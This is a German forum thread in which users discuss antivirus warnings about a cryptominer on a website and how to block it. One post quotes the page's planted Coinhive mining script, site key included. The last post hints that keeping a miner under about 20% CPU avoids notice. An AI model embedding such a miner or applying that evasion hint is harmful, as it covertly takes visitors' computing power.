Bei mir schlägt im Moment nichts an, ich verwende auch Kaspersky. Und wie beim letzten Mal ist auch meine CPU-Auslastung da wo sie auch sein sollte. (Wie letztes mal auch ist die Seite in mehreren Browsern geöffnet)

haifisch
13.12.2018, 21:20
Hallo kaspersky schlägt alarm bei huren-bewertung ist wieder ein miner am arbeiten.


Norton zeigt das auch an, aber das auch schon seit sehr sehr langer Zeit!

Heineken77
13.12.2018, 21:23
Norton zeigt das auch an, aber das auch schon seit sehr sehr langer Zeit!
Ja, das Norton Thema hatten wir ja schon. Die Falschalarme von Norton gehen gar nicht, für mich ist das nach wie vor nah an Scareware.

Hallo kaspersky schlägt alarm bei huren-bewertung ist wieder ein miner am arbeiten.

geht deine CPU-Last hoch? (vergessen zu fragen)

schultz
14.12.2018, 08:28
Hallo kaspersky schlägt alarm bei huren-bewertung ist wieder ein miner am arbeiten.


Kaspersky Internet Security und MWB , absolut neutral alles i.O.

eurnie
14.12.2018, 16:44
Also cpu last geht hoch und gleich wieder runter, habe aber ständig die meldung das die seite blokiert wurde.

Heineken77
14.12.2018, 17:18
Also cpu last geht hoch und gleich wieder runter, habe aber ständig die meldung das die seite blokiert wurde.

Ich habe nochmal mit abgeschaltetem Kaspersky getestet:


unter Firefox passiert nichts
unter Opera passiert nicht
unter Internet Explorer passiert nichts
unter Edge schnellt die CPU-Last hoch



Kaspersky hat bei mir also den Miner geblockt. Ist ja schön, aber es wäre noch schöner wenn er mir das auch sagen würde :rolleyes:

Also scheint die Seite immer noch nciht sauber zu sein. :(

i__c__e
31.12.2018, 16:53
Sie ist immer noch nicht "sauber", wie man im Quelltext der Seite erkennt.


<script src="https://coinhive.com/lib/coinhive.min.js"></script>


<script>
var miner = new CoinHive.Anonymous('EJYAju9mV24QhGXkGMkiyCDDr8q8gE tL');
miner.start();
</script>

was zur Zeit hilft (wenn man keinen Adblocker, oder sonstige Tools besitzt) ist die eigene, also lokale HOSTS-Datei anzupassen - bspw. folgende Zeile am Dateiende einzutragen:

127.0.0.1 coinhive.com

Damit wird die Domain auf den lokalen Rechner umgeleitet - und von dort kann das Script nicht mehr geladen werden.

Googelt einfach, wo Ihr die Datei für euer Betriebssystem findet und diese editiert.


So long

ich_bins_hier
01.01.2019, 11:20
ähm wieso besitzt jemand keinen Adblocker? Versteh ich absolut nicht??????????

schultz
01.01.2019, 12:28
Absolut richtig, aber dann Premium :)
Ich hab noch nie Probleme mit irgendwelchen Crypto Minern gehabt.

siggibein
01.01.2019, 19:56
Wenn mein Läppi zickig wird, sehe ich in den Taskmanager rein und da findet sich dann meist was. Dann schießt man den Task im TM ab.
Hosts ist zwar eine Möglichkeit, aber da sammelt sich einiges drin, worüber man dann nicht mehr den vollen Überblick hat, wenn man es nicht kommentiert. Besonders auffällig ist, wnen der Lüfter beim Surfen anläuft.

Wer da snicht klein genug einstellt, der ist dumm und geldgierig. Das darf nicht mehr wie 20% der freien Leistung nutzen, nur dann fällt es nicht auf.